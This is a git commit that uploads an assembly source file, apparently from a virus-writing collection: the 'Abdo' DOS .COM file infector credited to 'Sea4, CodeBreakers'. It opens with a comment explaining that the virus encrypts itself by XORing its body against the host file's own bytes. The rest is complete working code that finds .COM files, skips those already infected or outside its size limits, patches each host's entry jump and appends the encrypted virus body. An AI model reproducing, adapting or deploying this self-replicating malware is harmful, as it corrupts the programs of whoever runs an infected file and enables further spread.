Add files via upload

2026-06-15 15:29:23 +00:00 · 2021-01-12 17:29:01 -06:00
parent 60045f672b
commit 039994e413
86 changed files with 41158 additions and 0 deletions
@@ -0,0 +1,180 @@
+; NAME: Abdo.com
+; AUTHOR: Sea4
+; SIZE: 310 bytes
+; ENCRYPTION: Yep
+; STEALTH: Nope
+; ROI: All files in current DIR
+; DT: Nope
+
+; Here is an interesting concept in encryption. Brought to my attention by
+; Aperson. The virus will use the host programs own bytes to XOR against. Its
+; very interesting because there is no way to tell what the host will have
+; as its values, so the encryption could almost be considered random. Upon
+; infection, the father virus will read from the victim file enough bytes to
+; cover the encrypted area. It will then, XOR each virus byte against each
+; host byte and keep the results in the buffer. It will then write those new
+; bytes to the victim. Upon startup of the victim it will call the Decryption
+; with a pointer (BX) to the bytes to use as Decryptors. Of course this has
+; a flaw if the host program decides to change its own bytes, though highly
+; uncommon among normal progges. Enjoy!
+
+Start:
+jmp  V_start                  ; Jump to start of virus
+          
+V_start:                      ; delta offset stuff
+call Delta
+Delta:
+pop  bp
+sub  bp,offset delta
+
+SkipDec:                      ; Call decryption
+jmp  Ende                
+; mov  cx,Crypto-Hidden  
+lea  si,[bp+Hidden] 
+mov  di,si     
+mov  bx,103h
+Call Crypto
+
+Hidden:        
+
+mov  di,100h                  ; Restore first 3 bytes
+lea  si,[bp+saved]
+mov  cx,3
+rep  movsb
+
+mov  ah,4Eh                   ; Find first/next com files
+FindNext:                
+xor  cx,cx               
+lea  dx,[bp+FileMask]
+int  21h        
+
+jnc  Open                ; Found one, open it
+jmp  Exit                ; Didn't find any, return to progge
+
+Close:
+jmp  ShutFile
+
+Open:           
+mov  ax,3D02h            ; Open file
+lea  dx,9Eh     
+int  21h        
+
+xchg bx,ax               ; File handle into BX
+
+mov  ah,3Fh              ; Read first bytes into buffer
+lea  dx,[bp+saved]
+mov  cx,3
+int  21h
+
+xor  ax,ax
+cmp  ax,[80h+1Ch]
+jnz  Close
+
+mov  ax,[80h+1Ah]
+
+cmp  ax,0F000h                ; Infection criteria
+jnc  Close                    ; No files > 61440d bytes     
+cmp  ax,400h                  ; None < 1024d bytes
+jc   Close
+
+sub  ax,3                     ; Makes account for the JMP
+sub  ax,Ende-V_start          ; Subtracts the length of virus
+
+cmp  ax,[bp+saved+1]          ; If the file jumps to AX then it must be
+                              ; infected with this virus, or its very lucky
+je   Close                    ; Close it up if its already infected
+
+mov  ax,[80h+1Ah]             ; Set new JMP destination
+sub  ax,3                     ; Subtracts the JMP length
+mov  [bp+jumpto],ax           ; Puts the jumpto location in its buffer
+
+mov  ax,4200h            ; Return file pointer to beginning of file
+xor  dx,dx
+xor  cx,cx
+int  21h
+
+mov  ah,40h              ; Writes the new JMP
+mov  cx,3
+lea  dx,[bp+jumping]
+int  21h
+
+XorValues EQU  Crypto-Hidden+Buffer
+
+mov  ah,3Fh              ; Read from File to get XORvalues
+lea  dx,[bp+xorvalues]   ; The file pointer is already at 00:03h
+                         ; now we just need to put the bytes in a buffer
+mov  cx,Crypto-Hidden    ; Length of Bytes to get ( Same length as hidden
+                         ; area, because thats all we need. )
+int  21h                 ; Tells DOS to fetch some bytes
+
+mov  ax,4202h            ; Move File pointer to end of progge
+xor  cx,cx
+xor  dx,dx
+int  21h
+
+mov  ah,40h              ; Write Call decryption routines
+lea  dx,[bp+v_start]
+mov  cx,Hidden-V_start
+int  21h
+
+lea  di,[bp+buffer]      ; Call encryption of Hidden area
+lea  si,[bp+hidden]      
+mov  cx,Crypto-Hidden 
+push cx                  ; Saves CX for the write
+push bx                  ; Saves BX because it is the file handle
+lea  bx,[bp+xorvalues]   ; Place where victim file's bytes have been put
+call Crypto              ; Calls the encryption routine
+pop  bx                  ; Retrieves the file handle for the Write
+
+mov  ah,40h                   ; Write encrypted area to file
+pop  cx
+lea  dx,[bp+buffer]
+int  21h
+
+lea  dx,[bp+crypto]           ; Write encryption routine to victim
+mov  cx,Ende-Crypto
+mov  ah,40h
+int  21h
+
+ShutFile:                     ; Close victim and search for next
+mov  ah,3Eh
+int  21h
+mov  ax,4F00h        
+jmp  FindNext
+
+Exit:
+push 100h
+ret
+
+FileMask  db   '*.com',0 
+VirusName db   '[Abdo]',0
+Author    db   'Sea4, CodeBreakers',0
+message   db   'Concept by: Aperson of the CodeBreakers!'
+
+Saved     db   0CDh,020h,090h
+Jumping   db   0E9h
+jumpto    db   0h,0h
+
+Crypto:
+EncLoop:
+lodsb                    ; Takes the byte from [SI]
+mov  dl,[bx]             ; Gets the next byte of host file
+xor  al,dl               ; XORs the 2 bytes, and saves them in AL
+inc  bx                  ; Moves to next byte 
+stosb                    ; Places the byte back in [DI]
+loop EncLoop             ; Does 'em all
+ret                      ; Return to calling routine
+
+Buffer:
+
+Ende:
+lea  di,SkipDec
+lea  si,NewBytes
+                
+mov  cx,3       
+rep  movsb      
+jmp  Hidden     
+
+NewBytes:
+mov  cx,Crypto-Hidden
+Finish: